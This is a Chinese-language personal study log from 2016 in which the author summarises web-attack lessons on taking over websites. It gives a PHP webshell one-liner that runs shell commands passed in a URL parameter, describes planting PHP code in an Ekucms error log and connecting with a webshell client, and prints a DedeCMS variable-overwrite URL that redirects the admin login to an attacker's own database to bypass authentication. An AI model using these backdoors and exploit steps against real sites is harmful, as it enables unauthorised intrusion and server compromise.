2016年4月4號***學習總結

  今天剛從家裏回來,電腦還出了點問題,弄了半天,所以今天也沒有學習多少。主要學習了幾個漏洞。



  php包含漏洞的演示:今天迪哥拿的易酷cms來做的演示,易酷的cms有一個錯誤日誌的記錄功能,要拿下一個網站,可以先看它用的是什麼cms,知道了它用的是什麼cms之後,可以去網上查這個cms有什麼漏洞,也可以去網站上下載源碼在本地測試找出漏洞。因爲易酷的cms網站有錯誤日誌記錄,所以我們要首先構造錯誤,再讓網站記錄這個錯誤,所以我們要在url地址上輸入一句話,因爲網站本來就是php的,所以php代碼的開頭可以不用寫。寫上以後,就要去網站找到這個日誌記錄文件菜刀鏈接,這個網站就可以拿下了。

 

 代碼執行漏洞:這個漏洞比較少見,多出現與大型的網站中。在利用時,可以把<?$cmd=$_GET['x']; echo shell_exec($cmd);?>寫入網站的文件中,就可以把它當作一個後門,在url中連接這個文件,給x賦值,賦的值就是命令的代碼,這時網站就會執行這條命令,得到我們想要的信息,但前提是,網站沒有禁用這個函數。


 變量覆蓋漏洞:變量覆蓋漏洞,是一個比較重要的漏洞,我個人的理解,變量覆蓋漏洞就是對同一個變量進行多次賦值(由於用兩個$表示了一個變量),使後一個值覆蓋了前一個值。在實際的利用中我們可以這樣:

http://www.xx.com/織夢網站後臺/login.php?dopost=login&validate=dcug&userid=賬號&pwd=密碼& _POST[GLOBALS][cfg_dbhost]=MYSQL外鏈IP&_POST[GLOBALS][cfg_dbuser]=MYSQL的賬號&_POST[GLOBALS][cfg_dbpwd]=MYSQL的密碼& _POST[GLOBALS][cfg_dbname]=自己的dedecms的數據庫    這樣寫以後,會把原始的變量覆蓋,網站就會鏈接上我們自己的數據庫,這樣我們就可以直接進入後臺。(我也還沒弄明白這是爲什麼)


   今天就先寫這麼多吧,累了j_0057.gif


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章